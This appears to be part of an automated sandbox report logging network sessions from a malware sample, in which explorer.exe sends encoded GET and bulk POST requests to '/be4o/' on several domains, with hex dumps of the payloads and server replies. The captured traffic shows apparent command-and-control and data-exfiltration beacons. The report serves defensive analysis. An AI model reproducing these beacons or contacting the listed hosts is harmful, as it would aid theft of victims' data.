                                                                                                                                                                                                                              Data Ascii: daEWbU8Ww8TlxD08o-Mn4_pSAXlMj5Q-RxzcaS7FEwNeVXEiRrq7HxGSaA2jt7ct8YxObWIaRiGRM-1n6qy_d99dkk63qoNjP6D4o0OXTCkgJjEkZepgQHpnlBNypKFcaTaAWXPlo19BWyxYLwfpWxQRk4ThKRHzWJVc4oXEF0rh1TlkIxNQ4-DJtBofPcpxaheP9BNjeD9KZRK5bv~rp_(tPBqlzDeXmLUHSY~5qoFwejEhlUB
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037408113 CET11032OUTData Raw: 38 39 39 5a 49 4c 31 54 67 51 58 51 36 78 61 35 47 6c 44 68 6f 6f 48 54 73 58 57 65 34 67 49 52 36 78 6a 74 59 4e 44 62 6c 43 47 5a 63 30 55 71 44 62 69 32 6d 47 4b 65 58 47 74 4a 48 71 7e 4e 64 59 64 41 35 33 28 71 51 6c 43 43 55 6b 7e 43 34 57
                                                                                                                                                                                                                              Data Ascii: 899ZIL1TgQXQ6xa5GlDhooHTsXWe4gIR6xjtYNDblCGZc0UqDbi2mGKeXGtJHq~NdYdA53(qQlCCUk~C4WKsWMx9lKQPnpj6CQJZYx6E4mEeulMInMXMmy8dv5F6wHfcmZt6D4mVO-~sm6~4HR0Yjcf6uUyyQMkE(I7UBA(x6nHnNZLRGLDzLe1qQrWWRvmhut3GLJua4vgCwGigBQ7rwOeMN1PXpjODkBvQQP1A1Z1GBRNR2yF
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037705898 CET11035OUTData Raw: 44 4d 52 5a 73 4b 6e 33 51 51 33 6c 52 39 47 4f 4c 43 47 4f 4e 5a 49 49 76 37 77 49 43 6c 78 68 67 52 6a 4f 58 31 79 31 30 53 45 41 62 6a 49 37 65 64 4a 46 64 57 74 67 4f 52 50 64 50 74 51 59 73 66 4c 43 71 6e 4d 74 75 5f 76 46 38 78 6e 75 30 4e
                                                                                                                                                                                                                              Data Ascii: DMRZsKn3QQ3lR9GOLCGONZIIv7wIClxhgRjOX1y10SEAbjI7edJFdWtgORPdPtQYsfLCqnMtu_vF8xnu0NVfCCUfHh2WhWQqfS7P7pgGdljgVl3Eo76anOY2XTGyJGkMzpCp4FwZBnmklLp05FVAvCoacJhYcoLjtJX6zQnS3cKN421og-TU724v8M1ak3pMInJrPeqUevSxcQBWwO26vpdM5IDG7csbleDY6xtiUTTemEVkd3c
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.037883043 CET11038OUTData Raw: 4f 4d 54 72 56 52 43 6c 6a 7a 68 47 41 64 6e 65 57 76 39 4a 66 62 35 59 38 57 48 64 31 65 28 71 4e 68 30 72 51 52 58 41 52 4c 58 36 31 6d 78 6c 56 44 4e 53 49 54 77 58 65 34 79 54 75 4b 31 58 5a 6d 64 50 39 68 54 50 75 79 30 53 56 50 48 76 41 46
                                                                                                                                                                                                                              Data Ascii: OMTrVRCljzhGAdneWv9Jfb5Y8WHd1e(qNh0rQRXARLX61mxlVDNSITwXe4yTuK1XZmdP9hTPuy0SVPHvAFiyinMheQYfHfEbkqZXDWk6XHK17oDUKEyY9oGVpRLwY7vw5a2iokfahXc_PhK1T1WNNkh6ILA9QQRLCgNNbQHgskwhf8eVDi0w3XARoaPhvHxHoN54VKQmaBXYNmnfhfeGFyTVXhK69RbUTAs3CZsu8zjQhVDGJHb
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.038012981 CET11050OUTData Raw: 33 66 42 55 51 66 75 5a 38 4b 4a 47 46 77 4b 71 33 35 35 46 6f 6b 6f 48 46 6e 36 32 6e 47 6b 59 76 6c 44 51 57 30 46 55 66 7a 51 77 52 4c 6f 2d 71 42 4d 31 53 70 58 69 49 32 63 76 4b 45 6b 72 4a 5a 54 79 43 46 31 73 4f 59 31 34 58 48 75 68 57 33
                                                                                                                                                                                                                              Data Ascii: 3fBUQfuZ8KJGFwKq355FokoHFn62nGkYvlDQW0FUfzQwRLo-qBM1SpXiI2cvKEkrJZTyCF1sOY14XHuhW3mR01xsWki7wMMEPr8RaMRiDB2OKc7tP07w76n2tEdQwNSnqYFpzpFCo4DQ74ImUcmuxelnhyaEstRVg_SNgrwwa-b5E3fBIO77F5b43mDk53FufgtYv7Em3AnL2O74A8lOuCpPULQo~rt1Hd60tmB25G~kQaXEkV7
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.038233042 CET11052OUTData Raw: 4c 45 36 71 79 42 73 52 6b 75 39 70 55 5f 6a 4e 62 79 4e 6c 55 30 4e 4f 61 55 7a 6a 31 6c 43 42 6d 4e 69 71 76 48 6f 57 49 7a 43 4b 53 70 68 46 36 39 33 4c 71 47 59 75 67 42 36 30 6c 4c 4f 71 79 34 44 4b 4f 4a 4b 46 72 43 36 51 4e 54 51 58 34 41
                                                                                                                                                                                                                              Data Ascii: LE6qyBsRku9pU_jNbyNlU0NOaUzj1lCBmNiqvHoWIzCKSphF693LqGYugB60lLOqy4DKOJKFrC6QNTQX4ARzCV3YKALrOT61Zq4vFXmNDZGgC4m7y6ItnYjmmG~rSjUZABE4TURGqJPf2MkbVG0LhiMwOxaofiF0~t9ofjU8538LErStSggXHqOZlR~XjU9P4BpFqN7I(Ecg7KDONNYnNmbIj-Ay837ekfWNrNEHDPA-NqYoVVZ
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048273087 CET11055OUTData Raw: 79 6d 73 75 58 6f 76 63 61 79 61 6e 67 35 77 6e 6c 49 61 5f 4b 77 49 63 61 72 50 61 43 38 55 74 56 34 6e 46 31 44 53 46 77 54 64 5f 4e 49 75 4a 44 47 45 77 48 61 68 61 75 30 7a 53 6d 78 41 6d 52 65 6d 69 42 61 75 44 28 4b 38 7a 7e 50 4c 77 37 6c
                                                                                                                                                                                                                              Data Ascii: ymsuXovcayang5wnlIa_KwIcarPaC8UtV4nF1DSFwTd_NIuJDGEwHahau0zSmxAmRemiBauD(K8z~PLw7lpVkA5XEYujVLALSPVaA5CwtKg_Y3Yqi6U29wLb4TQVRzW0SABoz2n3WMGHVjZ4551hranEqte1GCq6V0Q-hgcuw8L061wMOfgnHFXQAPNRHjUFT3Irzfp_L1P5rYlCFjuo33KZN0FwtatT2I2u(x2XpCihBq33cIi
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048430920 CET11057OUTData Raw: 38 69 75 72 49 43 54 4e 70 74 70 48 63 6e 7e 6f 76 71 48 48 6c 61 7a 6b 69 4a 4b 48 6e 38 53 6c 6e 77 34 31 63 4d 51 6d 4d 43 43 56 4d 77 63 61 79 6c 4f 4a 5a 44 7e 38 4b 50 63 53 59 35 4c 44 6c 6b 47 42 70 66 38 4f 7e 45 42 6d 45 77 43 31 51 76
                                                                                                                                                                                                                              Data Ascii: 8iurICTNptpHcn~ovqHHlazkiJKHn8Slnw41cMQmMCCVMwcaylOJZD~8KPcSY5LDlkGBpf8O~EBmEwC1QvCOChrUvXRGZgRNpdB9aebaeBdnpwsBnIdyj4UO9zHLP0mJQl02NsFRgPXWVGnY6g1YTW1mxi4lRBijtqqeBou5zn~7Ih47dDF7vYF538FexfS_RQS5IsrCh3Wj07tlYnS65vhLXcUimGN7c4XZM7MYnyOArNjaXzR
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.048775911 CET11058OUTData Raw: 68 4d 4b 53 75 46 5a 56 74 49 44 65 6f 75 62 31 62 4b 34 54 39 59 35 48 39 4a 37 68 53 36 33 6e 47 70 59 59 6a 39 50 6c 53 39 43 43 7a 6c 67 66 37 6a 46 68 4e 39 4f 4f 47 45 6d 63 55 5a 5a 45 74 78 6d 4c 59 70 55 6d 4e 73 75 6a 5a 39 76 63 66 47
                                                                                                                                                                                                                              Data Ascii: hMKSuFZVtIDeoub1bK4T9Y5H9J7hS63nGpYYj9PlS9CCzlgf7jFhN9OOGEmcUZZEtxmLYpUmNsujZ9vcfGzr9x8Aut50yyMrACVqkyHDVktBS8d39wMNsLHyMC53aeUojU(_HGqU2LtZbX1tkeMd8TI-Hb6-U2vzaD6fjieirY55~z2bPWjVF2Jt3LgY2Vcs4ZROXojV99qZaAZmFNZaFb1jAmLMg04mlwRMGooAVlC1rhFjZ38
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.049010992 CET11069OUTData Raw: 67 6a 53 42 68 4b 42 77 57 72 72 70 38 4d 6c 34 48 64 38 2d 44 44 4c 31 45 37 52 76 58 38 74 33 69 4a 67 51 77 34 59 4b 30 41 57 63 36 72 67 44 31 73 37 46 55 35 44 7a 6b 67 4c 54 71 53 6d 58 44 53 4e 72 4d 7a 31 72 65 6c 30 71 70 47 77 7a 39 4f
                                                                                                                                                                                                                              Data Ascii: gjSBhKBwWrrp8Ml4Hd8-DDL1E7RvX8t3iJgQw4YK0AWc6rgD1s7FU5DzkgLTqSmXDSNrMz1rel0qpGwz9OOEAfYevjh3Vh2TgZZD761V5W2-8lH33TSCXXL5TxabOiHy0rhwZVmWHKIHLZ4bxK0QYnPgnmcmmuKHof3iqs3Cu0s6cfN6atK-HV3DY806AXhBeEQ6(k4LWGhy0AKS4t2E5d1fF9AoaKeJGO~Z3U0jr-2mwk9khBD
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.197734118 CET11192INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:54 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CpLPvD4XQuVnha6rO1wNCX6rSp91UJvoNJN0meDWFFo5JM5s7CpzF76GDsyLNNL0W4YULbTU4G/1WiDDezugCQ
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              49192.168.11.204985034.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.036108017 CET11027OUTGET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.josiemaran-supernatural.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.205997944 CET11193INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:54 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "620175f4-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              5192.168.11.2049781154.23.172.3880C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.362416983 CET8962OUTGET /be4o/?h48Hl=2H0l+vSkOseleOGxaYuOAM6EcVRszlgpd1g39MbiOsu7jwlookSoZaEGSOy4tzpz9QV3&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.7bkj.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.528933048 CET8963INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:51:35 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: security_session_verify=a89d9fee5fcc7c3745bbd54a26506816; expires=Thu, 24-Feb-22 23:51:35 GMT; path=/; HttpOnly
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              50192.168.11.204985145.195.115.7180C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.386236906 CET11196OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.rsxrsh.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.rsxrsh.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.rsxrsh.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 63 72 64 47 56 68 78 6b 35 75 7a 66 64 76 69 70 69 58 42 5f 6d 34 6b 41 6b 58 42 48 75 54 37 34 33 58 77 48 4a 33 74 54 6c 35 28 70 67 57 34 52 4a 4f 7e 63 6a 62 6f 4b 7e 61 6c 59 7e 5f 6c 69 64 4d 35 56 7e 74 34 66 65 53 6e 68 32 34 52 4a 52 34 7e 6c 50 4d 42 66 6d 56 32 4c 62 33 39 34 51 6a 7a 4d 78 77 46 63 73 73 32 54 75 70 68 50 5a 64 32 69 55 79 30 75 55 70 47 43 7a 36 74 61 57 73 47 42 34 76 5a 78 33 68 49 39 31 51 5a 44 44 34 6a 7a 33 34 58 65 52 51 63 39 58 4a 56 64 41 70 6c 54 41 6f 4d 34 73 46 6a 77 5a 5a 6b 33 46 39 70 79 43 63 47 79 72 69 69 6c 54 43 73 4d 6e 7a 28 76 30 2d 59 46 53 33 72 38 44 48 49 47 69 48 33 79 72 59 31 59 6b 48 74 4a 43 46 4f 62 51 48 7e 70 72 7a 69 47 6d 44 34 6c 73 58 61 52 32 55 58 50 6a 50 77 49 66 79 6c 61 73 51 4b 58 33 79 6f 35 50 57 63 35 63 31 58 5a 36 43 67 55 46 37 34 30 6c 4d 34 6e 65 4d 6b 4b 58 54 4e 55 59 6b 72 4f 62 46 6b 49 30 68 79 58 6f 48 28 30 45 53 36 4a 74 30 59 58 5a 62 48 6d 79 41 39 6c 6f 4e 6f 6b 7a 59 77 44 6e 4f 47 44 43 4c 51 70 59 63 78 31 69 72 33 4a 68 7a 75 6f 58 74 55 36 70 39 35 49 75 62 38 34 37 6e 43 6f 76 31 67 4a 77 37 64 39 79 57 34 69 69 4a 71 77 55 5a 30 50 30 54 6b 68 51 48 4f 47 50 55 62 61 79 53 67 79 59 33 43 65 54 48 6f 2d 73 64 67 53 65 4c 30 51 4e 55 31 4c 35 39 4c 36 74 71 7a 72 48 35 32 58 36 68 56 44 77 4c 55 34 77 38 75 6c 51 48 46 77 7a 49 6f 6e 6b 35 35 78 52 63 41 30 56 45 5a 52 48 64 4b 4d 48 48 7a 49 65 34 42 47 4f 79 37 51 6f 45 66 5f 39 52 30 4a 46 56 46 36 71 4e 55 39 38 2d 64 62 6a 43 4f 37 69 52 63 75 59 7a 34 6e 61 34 70 66 75 67 53 4a 54 42 58 6a 31 57 6f 38 7e 45 4f 4f 57 4b 54 55 44 5f 6d 59 4a 67 28 51 52 37 68 32 4f 45 63 62 70 6f 4c 54 55 53 61 46 76 5a 43 66 36 7a 33 78 55 43 77 69 28 2d 6b 62 62 51 41 5f 44 48 35 43 42 77 70 31 76 76 61 78 71 52 56 57 4b 59 57 51 4b 61 74 51 62 74 6f 75 44 59 4d 57 37 44 45 53 56 4f 70 4e 4a 78 6b 48 44 64 7a 69 76 37 52 6d 4d 4d 30 4a 78 36 56 50 4e 4d 76 6b 73 53 6d 6f 5a 63 5a 74 76 34 71 62 54 32 61 71 46 75 31 74 36 77 61 4f 53 59 78 75 4b 5f 38 76 34 46 59 61 75 5f 37 42 75 72 41 4f 68 6f 77 5a 71 6b 53 7a 76 55 36 59 42 2d 32 30 58 61 74 56 38 43 53 36 43 46 44 68 53 33 6c 77 6c 7a 74 70 51 6e 46 66 4b 55 28 54 61 48 78 4d 35 52 69 6b 79 4a 66 78 72 35 35 6a 30 64 4c 31 64 36 30 5f 6b 49 63 32 51 31 71 45 6a 52 32 57 38 6a 72 79 65 31 4b 35 6e 38 46 6c 76 46 30 79 50 5a 34 4c 58 2d 6d 70 38 6f 65 68 35 63 32 70 6f 70 45 41 36 44 73 59 55 50 4c 53 4b 4d 50 41 4a 76 67 46 72 78 28 65 46 37 42 6c 4b 73 7e 52 55 4a 6f 78 46 32 39 2d 73 7a 63 61 62 31 56 4c 4c 4b 4a 76 7a 6f 70 39 32 31 58 75 6e 41 56 57 69 7a 56 56 44 71 37 45 44 32 68 47 4a 46 35 46 54 6b 66 69 65 5f 4d 4d 4b 32 70 70 51 6d 65 36 4a 67 73 49 65 6c 6b 5a 53 70 72 63 63 36 41 32 66 51 6a 70 43 34 70 32 74 78 7e 79 28 6c 37 42 4e 47 32 68 71 48 6d 31 4a 4b 54 2d 46 51 46 69 38 58 78 6b 52 69 4a 4e 49 4b 36 50 7e 65 36 4d 52 77 51 44 66 2d 46 57 72 7a 51 6a 58 58 4e 4c 35 75 75 71 45 70 4c 79 41 52 65 54 58 66 56 38 28 79 77 32 39 6c 55 72 58 35 41 31 68 65 41 2d 79 56 6c 7a 65 6e 35 51 4e 44 74 73 62 56 48 66 67 63 4a 61 77 36 71 41 54 6a 7a 49 42 48 28 4d 4f 58 62 6a 53 6f 4b 62 48 62 35 79 4b 7a 33 41 37 77 54 5f 68 5a 55 72 41 38 71 71 39 51 57 41 33 31 61 71 50 57 50 6b 58 35 76 66 28 73 78 6c 73 65 75 51 37 35 78 76 4d 4b 4f 6d 48 64 6a 6d 45 46 51 45 36 41 61 46 45 65 43 49 5a 65 4f 36 76 39 75 6c 61 71 28 53 72 58 50 72 77 4f 70 52 36 5a 6e 62 4c 50 44 39 6c 63 55 64 47 6c 56 4a 4b 7a 58 2d 61 55 79 36 65 53 31 38 77 50 43 4e 77 38 4f 67 72 33 5a 54 6f 63 50 59 52 31 50 4d 73 31 30 54 56 38 28 57 36 63 4d 6b 62 78 6e 6a 54 37 44 66 71 4a 58 7a 37 78 75 42 46 7a 74 6c 42 35 32 6b 36 6b 48 6c 76 58 66 50 58 65 7a 36 66 31 33 56 79 46 64 58 50 52 59 49 5a 77 78 64 36 65 56 72 62 66 41 58 54 58 28 54 50 6e 76 62 44 61 45 37 39 31 72 52 6d 54 35 68 41 6f 5a 54 50 43 37 69 6c 4d 41 63 51 47 4b 61 61 6e 6f 59 4a 38 78 32 76 71 42 39 67 7a 66 59 51 70 46 45 35 6c 37 6c 6f 67 61 4f 74 54 32 72 55 6e 44 42 55 42 58 39 4e 35 48 41 75 5a 38 33 61 74 58 37 57 4f 58 55 42 58 79 2d 47 49 73 51 69
                                                                                                                                                                                                                              Data Ascii: h48Hl=crdGVhxk5uzfdvipiXB_m4kAkXBHuT743XwHJ3tTl5(pgW4RJO~cjboK~alY~_lidM5V~t4feSnh24RJR4~lPMBfmV2Lb394QjzMxwFcss2TuphPZd2iUy0uUpGCz6taWsGB4vZx3hI91QZDD4jz34XeRQc9XJVdAplTAoM4sFjwZZk3F9pyCcGyriilTCsMnz(v0-YFS3r8DHIGiH3yrY1YkHtJCFObQH~prziGmD4lsXaR2UXPjPwIfylasQKX3yo5PWc5c1XZ6CgUF740lM4neMkKXTNUYkrObFkI0hyXoH(0ES6Jt0YXZbHmyA9loNokzYwDnOGDCLQpYcx1ir3JhzuoXtU6p95Iub847nCov1gJw7d9yW4iiJqwUZ0P0TkhQHOGPUbaySgyY3CeTHo-sdgSeL0QNU1L59L6tqzrH52X6hVDwLU4w8ulQHFwzIonk55xRcA0VEZRHdKMHHzIe4BGOy7QoEf_9R0JFVF6qNU98-dbjCO7iRcuYz4na4pfugSJTBXj1Wo8~EOOWKTUD_mYJg(QR7h2OEcbpoLTUSaFvZCf6z3xUCwi(-kbbQA_DH5CBwp1vvaxqRVWKYWQKatQbtouDYMW7DESVOpNJxkHDdziv7RmMM0Jx6VPNMvksSmoZcZtv4qbT2aqFu1t6waOSYxuK_8v4FYau_7BurAOhowZqkSzvU6YB-20XatV8CS6CFDhS3lwlztpQnFfKU(TaHxM5RikyJfxr55j0dL1d60_kIc2Q1qEjR2W8jrye1K5n8FlvF0yPZ4LX-mp8oeh5c2popEA6DsYUPLSKMPAJvgFrx(eF7BlKs~RUJoxF29-szcab1VLLKJvzop921XunAVWizVVDq7ED2hGJF5FTkfie_MMK2ppQme6JgsIelkZSprcc6A2fQjpC4p2tx~y(l7BNG2hqHm1JKT-FQFi8XxkRiJNIK6P~e6MRwQDf-FWrzQjXXNL5uuqEpLyAReTXfV8(yw29lUrX5A1heA-yVlzen5QNDtsbVHfgcJaw6qATjzIBH(MOXbjSoKbHb5yKz3A7wT_hZUrA8qq9QWA31aqPWPkX5vf(sxlseuQ75xvMKOmHdjmEFQE6AaFEeCIZeO6v9ulaq(SrXPrwOpR6ZnbLPD9lcUdGlVJKzX-aUy6eS18wPCNw8Ogr3ZTocPYR1PMs10TV8(W6cMkbxnjT7DfqJXz7xuBFztlB52k6kHlvXfPXez6f13VyFdXPRYIZwxd6eVrbfAXTX(TPnvbDaE791rRmT5hAoZTPC7ilMAcQGKaanoYJ8x2vqB9gzfYQpFE5l7logaOtT2rUnDBUBX9N5HAuZ83atX7WOXUBXy-GIsQiehio9i6H3NjTjJ1R91NLcIXfIzIHMpnImMOhQpP2wRbUA6lfO5-TBZq4oRG870qktOyq8ai1A5M8s(fTKr8TAN1ENI_BlbQHKVr0meYO4zyC9nF0huCFAK79s6KZ5elTb2jW3eULLLgqij6ckEdB3jdi6g6f0Oqf9vS3Q2t2HVJAGf6JsFTux0P7KWijGwZNbjp~P22zrb39-SwKtYXSOQJv5B2RwYAV_WGIwUch7Y8HuPFk59UaEXpKq1woF0am2I4BaUQFkPKk9lSLdtg0AhcBd2IVG4FTo6d0lOMqlM85FuVyeBukSiIVbgekKbwA9pEo94Gkvmdq3R3vZfgaDYgD0Ba6qMuE9TiNyq3Z6AUKw3eV9thovZAHnmjAHC2FeQc6XvULwXRcGEkZ_jcngLnT1VNgihAZ2yMq-qkEQUOUi62u1seakRbagFhxTI-plS-0Goy8oQgUgOedLw856A2HH0n6dp_wkOtDEP0Vm1vJj1CpIShwliqHXat9L0CAN63ZgACYhBsvVBKUU2UK-ajbY2b1rQugMn-p5C3hW1me1nH(I2_cljVX3ah0WwdXMHseRuD355Nq7A6UpaYxaO2GaWMJxDrFKuuRCIgzFDRHYOkgeFYN77IUay2gRDAwBrtIAf1QG4ax1ZAH2rfzyMMW1W3IBYnhUWVhWPfygTLi23iE5LZqEcKPctBWVG2UBgaAT(y8s(jvLXCeEzXqS7LLOxmWQM4ToYVsjQ-g3Rm5nWf7zFuEinktHVgpKdTCxVoP_5TIG5YxWnda8aN(cCPgDTXMXcLkAgXm97OtS4BRAhc7zNX7YrLwb6BjkP95Clt4KUhTpnKwTa_jfQeQXppRGmQPVoI5TDA8UX2cj0i4LPVWcCBdVbrKJYiBDTFQS~ZlSdgodWWQa5u~jJ-KOTqtfHCv
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.386334896 CET11207OUTData Raw: 59 31 62 6c 44 63 77 55 72 53 79 42 69 77 37 4d 77 48 65 75 58 38 36 42 43 71 53 45 33 54 42 34 48 50 6f 43 67 66 34 72 77 50 47 30 39 78 4f 49 6f 65 51 67 78 36 62 72 47 39 50 72 30 6d 6f 38 54 4c 30 54 67 49 59 37 30 64 7a 59 62 74 46 54 42 4b
                                                                                                                                                                                                                              Data Ascii: Y1blDcwUrSyBiw7MwHeuX86BCqSE3TB4HPoCgf4rwPG09xOIoeQgx6brG9Pr0mo8TL0TgIY70dzYbtFTBKWxcVJg_mYRC9w80toIYFbWdtwGP0CCuhwVDoltzvUQRXsOzN5Wq29MJ0v64c8f6SrA2x0ro4A6FjsUH~_J-vdL91CERIOZlU2m-1HhD1J48TDLvm24mq5~zFlOIfad7S5laHgDOUJvHxym_HP6LxphndFgkx8YqWD
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552423000 CET11208OUTData Raw: 77 6c 37 43 4f 63 68 78 59 79 70 68 32 69 73 62 45 50 44 76 61 6b 49 28 63 43 4e 45 5a 47 4c 51 38 49 61 30 42 51 4d 69 56 71 42 4c 6d 58 64 49 57 68 52 68 6b 76 4a 6d 53 68 65 52 35 36 7a 32 6a 7e 73 5a 2d 37 6b 4a 36 70 2d 65 6c 41 53 54 6c 73
                                                                                                                                                                                                                              Data Ascii: wl7COchxYyph2isbEPDvakI(cCNEZGLQ8Ia0BQMiVqBLmXdIWhRhkvJmSheR56z2j~sZ-7kJ6p-elASTls_ap1BBgFAXw(-flzACaP7tbxnZLwkyvALDiAWMF4sSEP17ivG5nj4g1v2SeHTHufmRnvn0qSqHUC1bJEyyhXnvzdJo95tkkXi6CKSpkYaUwnkbOlN6dRfDteCxe9SfU9-Rf0kVJFSAo3VAsZmL2MT7vL_90HBPZmi
